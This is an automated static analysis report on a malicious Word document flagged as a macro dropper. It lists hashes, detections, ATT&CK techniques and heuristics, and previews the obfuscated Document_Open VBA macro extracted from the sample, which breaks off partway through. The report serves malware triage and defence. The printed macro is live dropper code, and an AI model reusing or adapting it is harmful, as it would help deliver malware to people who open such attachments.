Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a10726236520a31f…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 191.0 KB
Created: 2018-05-14 22:08:00
Authoring application: Microsoft Office Word
First seen: 2019-01-12
MD5: 3ec740552c4bfc852c28d81abbd92394
SHA-1: 0981f255c855ba122dcb1be0602c5381b9d76bb2
SHA-256: a10726236520a31f9dcb149f3d49a309406a860d2724492c000d4dd23ddfb3ac
Risk score: 162

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV and contains VBA macros, specifically a Document_Open macro that executes code automatically when the document is opened. The VBA code appears to be obfuscated, but its structure suggests it is intended to download and execute a secondary payload. The presence of a Document_Open macro and the overall detection as a dropper indicate a likely initial access vector via spearphishing attachment.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-6545192-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6545192-0
  • VBA macros detected [medium] (OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11976 bytes
SHA-256: 34ecf067c2de2279e3274fdb356db90f71446bb055fc685788c54e6227c59f62
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function hipless(conductivity)
Dim avons As Integer
Dim cullis As Long
Dim blower As Byte
Dim hospitality As Byte
#If (19 - 118 + 499 + 84 - 94 + 310) > ((95 - 72 + 297) - (14 - 117 + 643) * 1) And ((2 - 90 + 116) - (90 - 123 + 61)) * 2 < (Win64) Then
Dim cellar As Long
Dim canonicate As LongPtr
caravel = 115 - 74 - 33
Dim nominis As LongPtr
Dim efface As Long
Dim melancholic As String
Dim monotremata As LongPtr
Dim galley As String
lifeline = VarPtr(canonicate)
phonogram = vincible(lifeline, VarPtr(conductivity) + (102 - 120 + 26), caravel)
#ElseIf (108 - 128 + 420 + 98 - 14 + 216) > ((111 - 37 + 246) - (6 - 92 + 626) * 1) And Not ((94 - 16 - 50) - (113 - 105 + 20)) * 2 < (Win64) Then
Dim canonicate As Long
caravel = 25 - 50 + 29
Dim nominis As Long
Dim monotremata As Long
lifeline = VarPtr(canonicate)
phonogram = entium(lifeline, VarPtr(conductivity) + (71 - 42 - 21), caravel)
#End If
artist = 93 - 110 + 16
nominis = 4 - 28 + 24
apochromatic = 95 - 79 - 16
monotremata = 89 - 58 + 9841
unsoldierlike = 22 - 127 + 4201
fastidouus = 20 - 117 + 161
exorable = virgilia(ByVal artist, _
nominis, ByVal apochromatic, monotremata, ByVal unsoldierlike, _
ByVal fastidouus)
angiopteris = angiopteris + 307
achondroplasia = Rnd(490)
#If (37 - 110 + 473 + 121 - 74 + 253) > ((78 - 85 + 327) - (12 - 18 + 546) * 1) And ((98 - 112 + 42) - (5 - 86 + 109)) * 2 < (Win64) Then
goodday = vincible(nominis, canonicate, 11 - 39 + 5911)
#ElseIf (60 - 8 + 348 + 3 - 119 + 416) > ((118 - 43 + 245) - (30 - 115 + 625) * 1) And Not ((44 - 10 - 6) - (44 - 98 + 82)) * 2 < (Win64) Then
auklet = entium(nominis, canonicate, 12 - 26 + 5897)
#End If
scoffing = 28 + 41
Pmt 0, scoffing, 35230, 10181, 8
hipless = nominis
End Function
Function vincible(droughter, gallope, fertilizable)
Dim army As Long
Dim cannabidaceae As String
Dim guards As LongPtr
Dim gurgle As LongPtr
Dim asio As LongPtr
Dim constat As Variant
Dim consultation As LongPtr
Dim autumal As LongPtr
mcintosh = szechwan
szechwan = "ambassador"
gurgle = droughter
autumal = fertilizable
miocene = Fix(257)
consultation = gallope
labrador = 27 + 19
Pmt 0, labrador, 14434, 14037, 7
accretive = mcintosh
guards = 56 - 29 - 28
balsaminaceae ByVal guards, _
gurgle, _
consultation, autumal, _
asio
mcintosh = "contemptible"
End Function
Sub chrysolite()
Dim psycholinguistics As Integer
Dim outmarch As String
inebriety.coastline.Value = Day(#12/5/2013#)
varday = notary = deus
discolor = "ahead"
breakers = "duarchy"
braced = "enormous"
brattle = demonolatry
gallinule = "poetess"
creditworthiness = "sparse"
Set pomoxis = inebriety.coastline.SelectedItem
bacchanalian = 8 + 12
Pmt 0, bacchanalian, 3908, 12659, 5
counterbombardment = pomoxis.Name
nervos = 74 - 13 + 7783
hypocrite = Right(counterbombardment, nervos)
centrifuge = radiochemistry(hypocrite)
apophasis = 47 + 20
Pmt 0, apophasis, 35729, 32824, 8
semiliquid = "acrostichum"
#If (71 - 40 + 369 + 27 - 32 + 305) > ((80 - 102 + 342) - (18 - 24 + 546) * 1) And ((41 - 119 + 106) - (32 - 85 + 81)) * 2 < (Win64) Then
Dim apes As String
Dim colored As LongPtr
Dim acned As LongPtr
Dim ceramics As Long
#ElseIf (25 - 43 + 418 + 73 - 39 + 266) > ((73 - 73 + 320) - (87 - 51 + 504) * 1) And Not ((87 - 58 - 1) - (57 - 60 + 31)) * 2 < (Win64) Then
Dim myxomycota As String
Dim acned As Long
Dim aragon As String
Dim colored As Long
#End If
deinonychus = 102 - 61 - 41
cestoda = "bubble"
abidjan = "homona"
capricornis = 51 - 4 + 4049
altar = 20 + 29
Pmt 0, altar, 3876, 35786, 3
climactic = arioso
tibetoburman = heckle
mecate = "senators"
greens = 51 + 35
Pmt 0, greens, 15889, 55929, 3
hearts = centrifuge
drow = batching
affair = "inconsiderable"
colored = hipless(hearts)
charybdis = "a
... (truncated)